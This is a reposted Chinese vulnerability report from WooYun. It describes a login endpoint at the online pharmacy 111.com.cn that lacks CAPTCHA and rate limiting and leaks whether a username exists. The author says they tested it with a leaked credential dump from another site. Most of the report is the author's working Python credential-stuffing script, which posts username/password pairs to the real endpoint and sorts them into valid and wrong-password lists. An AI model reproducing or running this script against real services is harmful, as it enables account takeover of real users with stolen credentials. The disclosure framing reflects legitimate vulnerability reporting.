记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

壹药网某系统设计缺陷可方便撞库

2015-01-06 00:05

http://m.111.com.cn/question/login/

这个接口登陆,没有验证码,也不限制登陆失败次数.居然还会告诉你是用户名不存在还是密码错误,增加撞库的成功率.

虽然说增加了撞库的成功率,但是我去下珍爱网的裤子去撞,随机取1w条数据就只撞出来1条能登陆成功的帐号密码.

x.jpg



漏洞证明:

x.jpg



附上自己的扫号时的代码

code 区域
import requests

f=open("f1.txt","r")

all=f.readlines();

f.close()

PASSWORD_NOT_CORRECT=[]

OK=[]

try:

for each in all:

username=each.split(" ")[0]

username=username.strip()

password=each.split(" ")[1]

password=password.strip()

print username+" "+password

payload={"user_name":username,"user_psw":password}

res=requests.post("http://m.111.com.cn/question/login/",data=payload)

if res.text=='{"result":0,"errorCode":" \u7528\u6237\u4e0d\u5b58\u5728\uff01"}':

print "user does not exsist!"

elif res.text=='{"result":0,"errorCode":" \u5bc6\u7801\u9519\u8bef\uff01"}':

print "password not correct!"

PASSWORD_NOT_CORRECT.append(username+" "+password)

else:

if password!="":

OK.append(username+" "+password)

print "OK!"

except Exception,e:

print "exception:"

print e

print "-------FOUND----------"

print OK

print "-------PASSWORD NOT THE ONE------"

print PASSWORD_NOT_CORRECT

exit

print "-------FOUND----------"

print OK

print "-------PASSWORD NOT THE ONE------"

print PASSWORD_NOT_CORRECT

修复方案:

厂商更专业

知识来源: www.wooyun.org/bugs/wooyun-2015-089957

阅读:77279 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“壹药网某系统设计缺陷可方便撞库”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云

本页关键词